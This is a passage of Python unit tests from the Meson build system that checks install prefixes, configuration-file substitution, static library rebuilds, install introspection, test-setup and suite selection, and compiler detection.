Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
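# Write in_data to a temp file, run do_conf_file() over it, and return the
# generated output so the test can check that LF and CRLF line endings are
# preserved.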
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
return '\n'.join(result)
def check_formats (confdata, result):
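# Verify that all three variable formats ('meson', 'cmake' ${VAR} and
# 'cmake@' @VAR@) render the same expected result for the given confdata.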
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'),result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'),result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'),result)
confdata = ConfigurationData()
# VAR does not exist in confdata, so the result is a commented-out #undef
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False,'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True,'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value','description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10,'description')}
check_formats(confdata, '#define VAR 10\n')
# Check multiple substitutions in one string with the cmake formats
confdata.values = {'VAR': ('value','description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'),'#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'),'#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'),'#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'),'#define VAR xxx value yyy value')
# Check that malformed or mismatched input raises MesonException
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR'], confdata, 'cmake@')
# Unsupported (list) value in confdata
confdata.values = {'VAR': (['value'],'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir works. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run the buggy test with a setup whose env will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run the buggy test with a setup that has no env, so it will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
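        # Setups can be qualified per project: a bare --setup name only works
        # for suites that define it, so the foo: suite has to be excluded for
        # 'missingfromfoo', and 'onlyinbar' must either be given as
        # 'bar:onlyinbar' or have the other suites excluded.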
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
        self.assertIn('ENV_A is 1', default_log)
        self.assertIn('ENV_B is 2', default_log)
        self.assertIn('ENV_C is 2', default_log)
        self.assertIn('ENV_A is 1', mydefault_log)
        self.assertIn('ENV_B is 2', mydefault_log)
        self.assertIn('ENV_C is 2', mydefault_log)
        self.assertIn('ENV_A is 1', other_log)
        self.assertIn('ENV_B is 3', other_log)
        self.assertIn('ENV_C is 2', other_log)
def assertFailedTestCount(self, failure_count, command):
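        # This helper relies on `meson test` reporting the number of failed
        # tests through its exit status: a clean run means failure_count must
        # be 0, otherwise the CalledProcessError's returncode is compared
        # against the expected count.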
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
            raise Exception('Could not find someexe and somefxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# target private dir
someexe_id = Target.construct_id_from_path("sub4", "someexe", "@exe")
self.assertPathEqual(incs[0], "-I" + os.path.join("sub4", someexe_id))
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
self.assertPathEqual(incs[0], '-Isomefxe@exe')
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
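        # Record which compiler is used for the asm, C and C++ sources of each
        # target so their choices can be compared below.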
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
                    raise AssertionError('{!r} found in c-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
